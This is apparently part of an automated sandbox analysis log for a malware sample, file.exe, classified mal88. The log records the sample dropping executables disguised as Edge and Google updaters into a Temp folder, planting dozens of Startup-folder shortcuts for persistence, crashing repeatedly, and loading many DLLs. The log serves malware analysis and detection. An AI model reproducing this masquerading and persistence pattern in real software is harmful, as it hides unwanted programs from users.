Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_00A0DFC718_2_00A0DFC7
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC004018_2_04AC0040
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC2DF018_2_04AC2DF0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC76B018_2_04AC76B0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC000618_2_04AC0006
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC85A018_2_04AC85A0
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC858F18_2_04AC858F
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC39EF18_2_04AC39EF
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC2DE218_2_04AC2DE2
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC6DC818_2_04AC6DC8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC55C818_2_04AC55C8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC452918_2_04AC4529
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC329018_2_04AC3290
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC3A0018_2_04AC3A00
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC4E4018_2_04AC4E40
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC2BA918_2_04AC2BA9
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC2BB818_2_04AC2BB8
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC8B7018_2_04AC8B70
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC374818_2_04AC3748
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC375818_2_04AC3758
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeCode function: 18_2_04AC475018_2_04AC4750
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 932
Source: file.exeStatic PE information: invalid certificate
Source: file.exe, 00000000.00000002.2203991807.00000000009CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.2208484038.0000000008100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLKSM.exe6 vs file.exe
Source: file.exe, 00000000.00000000.2197367988.00000000005D0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameLKSM.exe6 vs file.exe
Source: file.exeBinary or memory string: OriginalFilenameLKSM.exe6 vs file.exe
Source: classification engineClassification label: mal88.winEXE@13/88@6/3
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeMutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3172
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6280
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess884
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6856
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeUpdaterJump to behavior
Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: file.exeReversingLabs: Detection: 18%
Source: file.exeVirustotal: Detection: 23%
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checker
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 932
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 932
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 932
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 932
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checkerJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Source: LKMService_55c2eb9fb8194b3183dae4b65fdda1b5.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f5a844d131a542409d15c7be5595addc.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_e473bf015e6148daa821e9cdba096597.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_513aa6e3c652483682fd1f51e46a8bd3.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c365a14f7cc645439df5ba22b5f10906.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_38b12ffdc3054b75a4cc42355d27321a.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_6bbe8cc63bcf4ed199794d58d51e869f.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_88f655959b0548ed994a963bf2f1d4d9.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_80b58aa1ecd34f41b1ed729e00929f51.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_baaca187cd3746ad83aad8ceea07a8c5.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_385556207e4d49bb88bb33a72ac98a68.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d827f342fe9c4f3d948a33ec240811fd.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7e8ecf4f001c41edb4100bd58d1d004f.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_2d708224935546eb848b785f0206ad51.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_9e92297ac52847c3a122730984e5abd1.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d5b565aee0b842f89c22c5f172678df9.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_aa8be52a868740eab8f8ec82641ac0c1.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f619a40d28e44231bbc0b75adc7e6593.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3a7884e208224a6c873f89801ccde078.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_70b4bf6c89434abb9c4a92d4a3107a31.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a37d9ccfb0194adf8213dc3f6997f78f.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_ec7e774008154f3596c8e5c3ca65b43a.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\GoogleUpdater.exe
Source: LKMService_8b0b963caf834d029f35df17c1c436c7.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1bc86309aad64beaaba50da47f1fe248.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7a283f2dc44047f9b90f76f7687c84db.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_3334419e53b3488ca85ae4de076f47dc.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_621b8830c943464c9d47e42d99b46857.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_a0df83e3640e4d8d8bc92cc51336f2f5.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_1260347513fa42eb8dbca954b1f9766f.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_30649bb19ccb493bae273224706f8bba.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_7b11985b0f4a44efbcfa9ebcdda85610.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_f259adaf5ff645509c195bf263dfd55e.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_c894375b99af48eb88116328de9ffb98.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_856eb967065a4a3faa5cc998ae92f005.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_0f1fdcd72fa2443cb400c03502902fe9.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_8127c9e300df4816a3f8c0b347934bf0.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_e64ab677b62d4831a2902f3e6bff49df.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d97d239314814309aa82de22ff2626e0.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
Source: LKMService_d9ae47459b854ee78156fea739ee2eba.lnk.2.drLNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\LKMService.exe
